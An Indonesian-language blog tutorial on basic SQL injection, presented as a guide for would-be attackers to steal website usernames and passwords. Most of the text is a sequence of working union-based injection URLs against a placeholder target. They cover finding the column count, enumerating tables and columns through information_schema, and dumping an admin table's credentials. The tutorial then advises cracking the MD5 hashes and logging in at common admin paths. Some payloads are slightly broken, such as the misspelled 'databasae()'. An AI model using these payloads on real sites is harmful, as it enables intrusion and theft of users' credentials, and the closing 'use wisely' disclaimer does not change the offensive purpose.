Teknik Dasar SQL Injection

Mungkin Para Senior Attacker pernah mendengar Istilah tentang SQLi atau SQL Injection, trick ini paling laris di gunakan oleh para Hacker Indonesia untuk mencuri username dan password sebuah website. Ini merupakan tutorial sederhana untuk para member yang ingin belajar melakukan percobaan SQLi pada salah satu website yang bisa di di inject dengan teknik ini.
Tanpa basi basi yang panjang, kita mulai pada sebuah contoh step-step :
Sekarang kita melakukan teknik tanda petik pada akhir URL sebuah artikel pada website target agar mengetahui kalau website itu memiliki Vulnerable dengan SQLi :



http://target.org/sql.php?inject=20'
setelah itu, kita mencari Halaman apa yang memiliki Hole
http://target.org/sql.php?injection=10 order by 1--
jika tidak ada error pada trick di atas, coba ubah seperti di bawah
http://target.org/sql.php?injection=10 order by 5--
jika cara di atas masih tidak bisa, coba dengan teknik lain seperti di bawah ini :
http://target.org/sql.php?injection=-10 union all select 1--
Atau
http://target.org/sql.php?injection=-10 union all select 1,2--
Atau
http://target.org/sql.php?injection=-10 union all select 1,2,3--

jika belum menemukan hole, lakukan seterusnya sampai Hole di temukan

Mungkin anda mau mencoba trick lain seperti ini
http://target.org/sql.php?injection=10 and 1=2 union all select 1--
Atau
http://target.org/sql.php?injection=10 and 1=2 union all select 1,2--
Dan
http://target.org/sql.php?injection=10 and 1=2 union all select 1,2,3--
Lakukan seterusnya sampe keluar kolom yang bermasalah.
Untuk melanjutkan tutorial ini maka kita anggap saja yang bermasalah pada kolom ke 3…
Jika telah menemukan kolom bermasalahnya, maka kita lanjutkan untuk mencari Versi SQLi nya
Contoh :
http://target.org/sql.php?injection=-10 union all select 1,2,version(),4,5--
atau
Contoh:
http://target.org/sql.php?injection=-10 union all select 1,2,@@version,4,5--
jika seandainya yang keluar versi 4, maka lewatkan saja, karena kita harus menebak table dan kolomNya, walapun sebenarnya bisa jika tebakan kolom dan table kamu benar, nah jika yang keluar versi 5 , silahkan lanjutkan.
Sekarang mari kita mencari Tabel pada website tersebut
http://target.org/sql.php?injection=-10 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databasae()--

Perhatikan File yang bagian ini:
>>group_concat(table_name)<< == ini untuk mencari Tabel dari database yang ada. >>from information_schema.tables where table_schema=database << == Kita tahu kalau ternyata di letakkan pada angka terakhir.

Nah sekarang table telah kita dapatkan, biasanya seh seperti ini yang tampil:
Admin|user | Forum | Berita | Pooling |
Setelah mendapatkan tabelnya, maka kita harus tahu apa saja yang ada di table tersebut, tapi biasanya table yang ingin di cari harus di Convert dulu menjadi ASCII
Contoh :
http://target.org/sql.php?injection=-10 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
61646D696E = admin = dari string kita rubah ke ASCII dengan menambahkan 0xASCII
Setelah dapat kolom, maka kita akan melakukan DUMP kolom tersebut, pada kolom yang terdapat pada table biasanya adalah
id
username
password
email
karena sudah tahu maka selanjutnya kita melakukan DUMPING
Contoh:
http://target.org/sql.php?injection=-10 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,email) from admin--
nah, setelah selesai melakukan Dumping maka username dan password ada di tangan anda, tapi tidak jarang kita menemukan password yang telah di encrypt dengan menggunakan MD5, untuk bisa mengetahui Normal Text nya tinggal Crack saja, banyak tool Crack MD5 Online, misal di www.md5decryption.com (contoh, tapi masih banyak kog), Tanya saja si penyambung lidah Online (google). Jika telah menemukan Normal textnya maka silahkan anda mencari Login Page Admin untuk bisa login sebagai Admin Site target.
Biasanya :
Biasanya :
www.target.com/administrator (Joomla)
www.target.com/admin/login.php
sebenarnya login page admin itu tergantung dari CMS yang site gunakan, tidak jarang CMS nya buatan sendiri, jadi bisa juga anda menggunakan Online Scan Tool untuk mencari Login Page Admin.
nah selesai deh, username n password ada ditangan anda, kalo seandainya password yang kita dapet di encrypt dengan md5 silahkan crack saja yah, banyak kok crack buat md5 yang online tool sekarang, kalau tidak percaya, tanya aja si Penyambung lidah Google.
Demikian Teknik SQL injection dari saya, Gunakan Ilmu dengan Bijak, tidak untuk merusak… karena Membuat tidak semudah mengkritik… jika melakukan pengerusakan website itu baik, maka tidak ada yang mau insaf dari kegiatan itu.

Note :
Saya sengaja membuat Artikel ini untuk teman-teman yang ingin belajar mengenai Teknik Sql Injection, Artikel ini bukan untuk anda yang telah mengetahui teknik ini. Mohon maaf jika Artikel ini tidak begitu sempurna karena saya bukan seorang HACKER baik itu Black Hat, White Hat, maupun Gray Hat…!!! Saya hanya seorang Blogger.
Saya membuat Artikel ini Bukan karena saya lebih Hebat daripada Anda Pembaca, tetapi saya hanya Cuma lebih dulu tahu, tidak pernah ada yang lebih hebat, yang ada hanya lebih dulu mengetahui sesuatu, yang membuat saya ingin membuat artikel ini agar ilmu yang saya dapatkan bisa di bagikan untuk siapa saja yang ingin belajar (Hanya yang ingin Belajar, Bukan Yang Ingin Merusak).